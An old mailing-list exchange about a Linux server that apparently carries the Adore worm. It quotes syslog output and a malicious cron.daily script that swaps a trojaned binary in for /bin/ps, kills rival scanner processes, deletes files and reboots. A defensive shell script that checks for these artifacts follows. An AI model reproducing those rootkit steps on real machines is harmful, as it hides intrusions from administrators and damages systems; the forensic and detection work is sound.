
RE: hacked?



On 10-Apr-01 Brock Noland opined:
> 
> Apr 10 06:30:03 nolandbros anacron: anacron startup succeeded
> Apr 10 06:30:03 nolandbros anacron[614]: Anacron 2.3 started on
> 2001-04-10
> Apr 10 06:30:03 nolandbros anacron[614]: Will run job `cron.daily' in 5
> min.
> Apr 10 06:30:04 nolandbros rhnsd: rhnsd startup succeeded
> Apr 10 06:30:04 nolandbros rhnsd[631]: Red Hat Network Services Daemon
> starting up.
> Apr 10 06:30:06 nolandbros linuxconf: Running Linuxconf hooks:
> succeeded
> Apr 10 06:35:03 nolandbros anacron[614]: Job `cron.daily' started
> Apr 10 06:35:06 nolandbros rhnsd[631]: Exiting
> Apr 10 06:35:07 nolandbros rhnsd: rhnsd shutdown succeeded
> Apr 10 06:35:07 nolandbros rc: Stopping keytable:  succeeded
> Apr 10 06:35:07 nolandbros Font Server[599]: terminating
> Apr 10 06:35:08 nolandbros xfs: xfs shutdown succeeded
> Apr 10 06:35:08 nolandbros gpm: gpm shutdown succeeded
> Apr 10 06:35:09 nolandbros sshd[481]: Received signal 15; terminating.
> Apr 10 06:35:09 nolandbros sshd: sshd shutdown succeeded
> Apr 10 06:35:10 nolandbros exim: exim shutdown succeeded
> Apr 10 06:35:11 nolandbros xinetd[466]: Exiting...
> 
> Look at that.. Then five minutes later it reboots... did it like 100
> times
> in the night..
> 
> 
> [root nolandbros cron.daily]# cat 0anacron
> #!/bin/sh
> if [ -f /sbin/reboot ]; then
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> /sbin/reboot
> exit 0
> fi
> killall -9 lpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 lpd7.sh >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-statd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-wu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-ftpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuftpd26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuscan >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hackwu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hacklpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 scan.pl >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 .bla >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 xargs >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 cat >>/dev/null 2>>/dev/null 3>>/dev/null
> mv /usr/bin/adore /bin/ps
               ^^^
Rather interesting name, this one.

> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> [root nolandbros cron.daily]#
> 
> That's in cron.daily.. Pretty sure that's not supposed to be there..

I haven't read up on the adore worm. I read about the ramen and tested
for it. I read about the lion and tested for it (and even caught it
working on breaking in at 3AM). But, haven't followed this one at all.
I'd check it out!

---
Capital punishment means never having to say "YOU AGAIN?"
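
A check for the artifacts visible in the quoted 0anacron script, as an added example that is not part of the original messages. The function names, the ROOT argument, the killall threshold and the sample tree are assumptions of this example; the paths come from the quoted script.

```shell
#!/bin/sh
# Added example, not from the thread. ROOT lets you point the check at a
# mounted disk image instead of the live "/" (an assumption of this example).

# Print one FINDING line per artifact seen in the quoted 0anacron script.
check_cron_artifacts() {
    root=${1:-/}
    root=${root%/}

    # Paths the quoted script moves or deletes.
    for p in /usr/bin/adore /usr/lib/lib /usr/lib/lib/0anacron-bak; do
        if [ -e "$root$p" ]; then echo "FINDING: path exists: $p"; fi
    done

    # Behaviours of the quoted script, looked for in every cron.daily job.
    for f in "$root"/etc/cron.daily/*; do
        [ -f "$f" ] || continue
        name=${f#"$root"}
        if grep -Eq '^[[:space:]]*mv[[:space:]]+[^[:space:]]+[[:space:]]+/s?bin/' "$f"; then
            echo "FINDING: $name moves a file into /bin or /sbin"
        fi
        if grep -q '/sbin/reboot' "$f"; then
            echo "FINDING: $name references /sbin/reboot"
        fi
        # Threshold of 5 is an arbitrary choice for this example.
        kills=$(grep -c '^[[:space:]]*killall -9 ' "$f" || true)
        if [ "$kills" -ge 5 ]; then
            echo "FINDING: $name has $kills 'killall -9' lines"
        fi
    done
}

# Constructed sample tree that mimics the state described in the thread.
build_sample_tree() {
    mkdir -p "$1/etc/cron.daily" "$1/usr/bin" "$1/usr/lib/lib"
    : > "$1/usr/bin/adore"
    : > "$1/usr/lib/lib/0anacron-bak"
    {
        echo '#!/bin/sh'
        echo 'if [ -f /sbin/reboot ]; then'
        echo 'mv /usr/bin/adore /bin/ps'
        echo '/sbin/reboot'
        echo 'fi'
        for n in lpd bind statdx wuscan scan.pl; do
            echo "killall -9 $n >>/dev/null 2>>/dev/null"
        done
    } > "$1/etc/cron.daily/0anacron"
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$1/etc/cron.daily/logrotate"
}
```

Since the quoted script moves a file over /bin/ps, run this from trusted rescue media against the mounted disk rather than with the tools on the suspect system.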




